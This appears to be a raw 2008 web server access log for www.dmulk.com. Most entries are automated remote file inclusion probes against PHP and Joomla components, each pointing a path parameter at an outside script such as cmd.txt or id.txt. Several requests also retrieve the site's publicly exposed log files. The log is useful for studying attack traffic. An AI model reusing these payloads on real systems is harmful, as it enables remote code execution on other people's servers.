69.139.67.45 - - [21/Feb/2008:07:17:25 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:07:17:34 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:07:17:35 -0800] "GET /index2.php?option=com_newsfeeds§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:07:17:35 -0800] "GET /logs/index2.php?option=com_newsfeeds§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:07:17:36 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:07:20:48 -0800] "GET /logs/index2.php?option=com_mtree§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:07:20:48 -0800] "GET /index2.php?option=com_mtree§ion=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.236.166.67 - - [21/Feb/2008:07:20:58 -0800] "GET /index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [21/Feb/2008:07:21:07 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [21/Feb/2008:07:21:08 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [21/Feb/2008:07:21:09 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:07:21:19 -0800] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:07:21:21 -0800] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:21:50 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:21:50 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:21:51 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:22:00 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:22:00 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [21/Feb/2008:07:22:01 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:07:22:04 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:07:22:04 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:07:22:05 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:07:22:25 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:07:22:25 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:07:23:47 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:07:23:47 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:07:23:48 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:07:23:50 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:07:23:51 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [21/Feb/2008:07:23:51 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://preciousland.co.uk/templates/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:07:23:52 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.116.154 - - [21/Feb/2008:07:23:54 -0800] "GET /logs/access_071229.log HTTP/1.1" 200 314379 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:07:24:41 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.198.234 - - [21/Feb/2008:07:24:42 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.delire.ru//modules/4nAlbum/public/doc/dan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.198.234 - - [21/Feb/2008:07:24:43 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.delire.ru//modules/4nAlbum/public/doc/dan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.213 - - [21/Feb/2008:07:25:08 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [21/Feb/2008:07:25:08 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [21/Feb/2008:07:25:08 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [21/Feb/2008:07:25:08 -0800] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:07:25:09 -0800] "GET /logs/access_080131.log/index.php?pagina=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:07:25:10 -0800] "GET /index.php?pagina=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.198.234 - - [21/Feb/2008:07:25:16 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.delire.ru//modules/4nAlbum/public/doc/dan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:07:25:16 -0800] "GET /logs/index.php?pagina=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [21/Feb/2008:07:25:45 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.122.250 - - [21/Feb/2008:07:25:56 -0800] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.173.130.137 - - [21/Feb/2008:07:26:09 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:07:26:29 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:07:26:35 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:07:26:37 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.164.26 - - [21/Feb/2008:07:27:23 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:07:28:12 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.8 - - [21/Feb/2008:07:28:12 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:07:28:12 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:07:28:32 -0800] "GET /index2.php?option=com_gigcal§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:07:28:32 -0800] "GET /logs/index2.php?option=com_gigcal§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:07:29:39 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:07:29:39 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:07:29:40 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:07:29:40 -0800] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.50.14.189 - - [21/Feb/2008:07:29:51 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.81 - - [21/Feb/2008:07:30:24 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.81 - - [21/Feb/2008:07:30:25 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 33494 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.19.144.26 - - [21/Feb/2008:07:31:18 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:07:32:48 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:07:32:48 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:07:32:49 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.237 - - [21/Feb/2008:07:34:10 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://hxr.as.ro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:07:34:55 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:07:34:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:07:37:45 -0800] "GET //config.php?path_to_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:07:37:55 -0800] "GET /logs//config.php?path_to_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:07:38:51 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.222.47 - - [21/Feb/2008:07:39:02 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [21/Feb/2008:07:39:02 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.152.75 - - [21/Feb/2008:07:39:55 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.152.75 - - [21/Feb/2008:07:40:48 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.152.75 - - [21/Feb/2008:07:40:49 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.152.75 - - [21/Feb/2008:07:40:49 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:07:41:22 -0800] "GET /logs/access_080126.log/?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [21/Feb/2008:07:41:22 -0800] "GET /logs/?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 36279 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:07:41:49 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [21/Feb/2008:07:41:49 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.180.200.40 - - [21/Feb/2008:07:42:05 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.49.142 - - [21/Feb/2008:07:42:18 -0800] "GET /logs/encapscms_PATH/core/core.php?root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.49.142 - - [21/Feb/2008:07:42:18 -0800] "GET /encapscms_PATH/core/core.php?root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.5.132.17 - - [21/Feb/2008:07:42:38 -0800] "GET /logs/access_080126.log//modify.php?dir_module=http://vps.istri.info/manual/secure.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.180.200.40 - - [21/Feb/2008:07:42:40 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.180.200.40 - - [21/Feb/2008:07:42:40 -0800] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.180.200.40 - - [21/Feb/2008:07:42:40 -0800] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://users5.nofeehost.com/capusha/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.5.132.17 - - [21/Feb/2008:07:42:42 -0800] "GET //modify.php?dir_module=http://vps.istri.info/manual/secure.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.132.17 - - [21/Feb/2008:07:42:42 -0800] "GET /logs//modify.php?dir_module=http://vps.istri.info/manual/secure.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:07:42:52 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:07:42:52 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.95.210 - - [21/Feb/2008:07:42:52 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:07 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:08 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:08 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:08 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:08 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:09 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.34.145.199 - - [21/Feb/2008:07:43:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.199 - - [21/Feb/2008:07:43:10 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:12 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:12 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [21/Feb/2008:07:43:12 -0800] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
59.188.29.73 - - [21/Feb/2008:07:43:14 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.14.221.150 - - [21/Feb/2008:07:43:48 -0800] "GET /logs/access_080211.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
